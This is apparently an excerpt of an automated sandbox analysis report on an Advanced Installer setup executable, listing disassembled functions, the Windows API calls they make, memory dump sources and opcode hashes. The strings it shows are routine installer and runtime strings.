                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsDevice
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 328075279-0
                                                                                                                                                                              • Opcode ID: 179a3b119a89529b77f40bba6ae167c2f08573ae60e13b6749e4d98e73d62663
                                                                                                                                                                              • Instruction ID: d83c1aeac7a6f3a0d644cddf40fe6679b743c9937eea00a8dfa715fa91e2b8e6
                                                                                                                                                                              • Opcode Fuzzy Hash: 179a3b119a89529b77f40bba6ae167c2f08573ae60e13b6749e4d98e73d62663
                                                                                                                                                                              • Instruction Fuzzy Hash: B7318FB1914608AFD712CF75DC49BAABBB8FF093A1F108327E415F2291EB3069458B60
                                                                                                                                                                              Function 00BB7110 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Focus$ChildWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 501040988-0
                                                                                                                                                                              • Opcode ID: afcc05cafbc918627b93d0086c2cb5e3b3e325ba6e6b9c649c18c0abed62e28a
                                                                                                                                                                              • Instruction ID: 643695069af9a56cfad61126922a8bcea099b5a95884d4b901e11a833d4326a1
                                                                                                                                                                              • Opcode Fuzzy Hash: afcc05cafbc918627b93d0086c2cb5e3b3e325ba6e6b9c649c18c0abed62e28a
                                                                                                                                                                              • Instruction Fuzzy Hash: 5631B1B0604606EFDB14CF69CD48FAAB7F8FF84710F10425AE515E72A1DBB5A814CBA0
                                                                                                                                                                              Function 00BC4480 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699), ref: 00BC44EA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699), ref: 00BC44F7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4548
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: 2540ed67d1111f2ae87650db16ec1bf8a9e7278205aa0577345f7af8f75df627
                                                                                                                                                                              • Instruction ID: 2cc2cbfa325923c03c328966e7cb6eec0cc891e3e6c8b5ba03663d615326cddf
                                                                                                                                                                              • Opcode Fuzzy Hash: 2540ed67d1111f2ae87650db16ec1bf8a9e7278205aa0577345f7af8f75df627
                                                                                                                                                                              • Instruction Fuzzy Hash: 9021A636900244DFDF11CF64D844BA97BB4FB16324F2402AAE859AB396D7325A49CB60
                                                                                                                                                                              Function 00BC4570 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699), ref: 00BC45DA
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699), ref: 00BC45E7
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC462E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: dbcef540c1c52c0fe3964965c0f5f1a2ff215e0475321c6db06fd891bda2fb8a
                                                                                                                                                                              • Instruction ID: c14cb5f8b105733ef2822bae78fbc66579d35e0b4ae0b01e617b4f3ee149995f
                                                                                                                                                                              • Opcode Fuzzy Hash: dbcef540c1c52c0fe3964965c0f5f1a2ff215e0475321c6db06fd891bda2fb8a
                                                                                                                                                                              • Instruction Fuzzy Hash: 1821C435900244DFDF11CF64DC44B99BBB4FF16724F2006AAEC55AB292D7329A49CBA0
                                                                                                                                                                              Function 00D05CA0 Relevance: 6.1, APIs: 4, Instructions: 62synchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05CB2
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05CDF
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05D15
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00D05062,?,?,?,?,?,00000003,00000000,02141699,00000000), ref: 00D05D38
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$ErrorLastObjectResetSingleWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 708712559-0
                                                                                                                                                                              • Opcode ID: 6d765198d7ffb4722eeea3df0ec781c3fdd94a365998e8d5d902624d5f099ab3
                                                                                                                                                                              • Instruction ID: 25a113d5410f3ebc340570d197b7006145ec0d378656fc0e8202abb21c7709f3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6d765198d7ffb4722eeea3df0ec781c3fdd94a365998e8d5d902624d5f099ab3
                                                                                                                                                                              • Instruction Fuzzy Hash: 79114F31604B409FE7319B1AE848B577BA5AB61324F184D1EE88B975E9C360ECC5CB70
                                                                                                                                                                              Function 00BC43C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(?,02141699,?), ref: 00BC441D
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,02141699,?), ref: 00BC442A
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BC4452
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                              • String ID: v
                                                                                                                                                                              • API String ID: 3991485460-3261393531
                                                                                                                                                                              • Opcode ID: 3424bd533d3463be52578b278525226032f229a05ec8deadcfe3423a4ecede42
                                                                                                                                                                              • Instruction ID: e77f731a81b8e9ff744d0097b26d0f3713bc021d429e776a752dcd7535be93fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 3424bd533d3463be52578b278525226032f229a05ec8deadcfe3423a4ecede42
                                                                                                                                                                              • Instruction Fuzzy Hash: 6921E936D04244DFDF05CF64D850BE9BBB4EB56324F2043ADD855A7392C7325A49CBA0
                                                                                                                                                                              Function 00BC1D90 Relevance: 6.1, APIs: 4, Instructions: 60windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DeleteObject$Select
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 207189511-0
                                                                                                                                                                              • Opcode ID: 76f57a5d78cc978dc1d0947c679f4107a99300a7cf5ae383ace9b55e82bdbf19
                                                                                                                                                                              • Instruction ID: 2dac44ad922ac5843cd46db3501a72dc904a379efcd499e1715c4fd0aeb6a54d
                                                                                                                                                                              • Opcode Fuzzy Hash: 76f57a5d78cc978dc1d0947c679f4107a99300a7cf5ae383ace9b55e82bdbf19
                                                                                                                                                                              • Instruction Fuzzy Hash: 9A110A71600606AFD7108F5ADD44F6ABBFDFB49720F10466AE814E3690D771A924CBA0
                                                                                                                                                                              Function 00BC1E40 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00BC1E9B
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00BC1EB4
                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00BC1EC0
                                                                                                                                                                              • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00BC1ED9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CompatibleCreate$BitmapObjectSelectViewport
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1881423421-0
                                                                                                                                                                              • Opcode ID: 642e0c851d61c28f64b82cc3482b1f4ae54ce935ddc3985460bb0cdf620c173b
                                                                                                                                                                              • Instruction ID: c18214432b6a559042967cc452bf92ba3a7bbdf192d88f4ab1f2fc9b1b88e4a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 642e0c851d61c28f64b82cc3482b1f4ae54ce935ddc3985460bb0cdf620c173b
                                                                                                                                                                              • Instruction Fuzzy Hash: 0321F975504B04EFD720CF59C944B6ABBF8FB08710F108A2EE8A6D7AA0D771A944CB90
                                                                                                                                                                              Function 00BBA910 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00BBA93B
                                                                                                                                                                              • BitBlt.GDI32(00000000,?,?,?,00000000,?,00000000,00000000,00CC0020), ref: 00BBA966
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00BBA96D
                                                                                                                                                                              • ReleaseDC.USER32(?,?), ref: 00BBA97A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteRectRelease
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2015589292-0
                                                                                                                                                                              • Opcode ID: 2688abedb34744e282ad236e3d0ad1120c6d6a45e0cfa250a89359b18879b0a0
                                                                                                                                                                              • Instruction ID: 9e1ef439e80aeddfa2d3183f23fafef2647829f5d52de09a6c9aeaa69e4f6bbd
                                                                                                                                                                              • Opcode Fuzzy Hash: 2688abedb34744e282ad236e3d0ad1120c6d6a45e0cfa250a89359b18879b0a0
                                                                                                                                                                              • Instruction Fuzzy Hash: AC011772204201AFD304DB69CC89F2BBBE9FB8C314F45852AF549D2661D770E818CBA2
                                                                                                                                                                              Function 00D7DB49 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00D7DB50
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00D7DB5B
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7DBC9
                                                                                                                                                                                • Part of subcall function 00D7DCAB: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D7DCC3
                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00D7DB76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 677527491-0
                                                                                                                                                                              • Opcode ID: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction ID: 5bd197c05396813ac1fd7007559bac95732d8962b36610ea17c3fa0a46ab5d6e
                                                                                                                                                                              • Opcode Fuzzy Hash: d7b80bd11d3c56be06c14d73a40700048800cc8670e53615a98b93b216a06df7
                                                                                                                                                                              • Instruction Fuzzy Hash: 71019A366002249FC706FB60D88597CBB72EF84340B28801AE805B7391DF746E86CBE5
                                                                                                                                                                              Function 00CE3690 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 270COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Remove-AppxPackage "%s" exit $error.count, xrefs: 00CE40BD
                                                                                                                                                                              • %s_%s_%s_%s_%s, xrefs: 00CE40A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                              • String ID: %s_%s_%s_%s_%s$Remove-AppxPackage "%s" exit $error.count
                                                                                                                                                                              • API String ID: 275895251-4071003702
                                                                                                                                                                              • Opcode ID: 4b1ae54e38f5dbb19c5715ec21cd2840ae6498358432885e40649e1039ceb30a
                                                                                                                                                                              • Instruction ID: 449b03eba2e229cdde15548af2ee7479bf5378bf193accdc0aea68789fc3d186
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b1ae54e38f5dbb19c5715ec21cd2840ae6498358432885e40649e1039ceb30a
                                                                                                                                                                              • Instruction Fuzzy Hash: 79A19D709012489FDB15DF69CC49B9ABBF4EF45310F1482E9E818A7292DB749F84CFA1
                                                                                                                                                                              Function 00BB4BA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 231windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00BB4C16
                                                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000), ref: 00BB4D12
                                                                                                                                                                                • Part of subcall function 00BB6670: SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFreeMessageSendStringWindow
                                                                                                                                                                              • String ID: AtlAxWin140
                                                                                                                                                                              • API String ID: 4045344427-3842940177
                                                                                                                                                                              • Opcode ID: 4d84ca6b63716de65e2c12946679febf6a0c49cd511c64ed6c0e210f39be3999
                                                                                                                                                                              • Instruction ID: 7e4f4a5ec07ad3b8840bda3d1d3c82ecb38d0b5c16e05d0b95760b04e0b2a8ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d84ca6b63716de65e2c12946679febf6a0c49cd511c64ed6c0e210f39be3999
                                                                                                                                                                              • Instruction Fuzzy Hash: 93911674600204AFDB14CF68C888BAABBF9FF48714F2085A9F9199B391D771ED05CB90
                                                                                                                                                                              Function 00D93E6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00D93EFD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                              • String ID: pow
                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                              • Opcode ID: 140793db20006d59c6306b1f32aebc7d1e3e22593f1cb00238b0700afe2d607c
                                                                                                                                                                              • Instruction ID: 84a03ab6538519312d352eb6fe1c99126d8e626fc71fb37164bea0ec111e0e17
                                                                                                                                                                              • Opcode Fuzzy Hash: 140793db20006d59c6306b1f32aebc7d1e3e22593f1cb00238b0700afe2d607c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F517971E082029ACF117F18C9013BA3BA1DF50740F388D99F4D5862E9EB358D999A76
                                                                                                                                                                              Function 00CFFCA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CloseHandle.KERNEL32(?,02141699,000000C9,00000000), ref: 00CFFE23
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,02141699,000000C9,00000000), ref: 00CFFEB1
                                                                                                                                                                              Strings
                                                                                                                                                                              • << Advanced Installer (x86) Log >>, xrefs: 00CFFD8F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
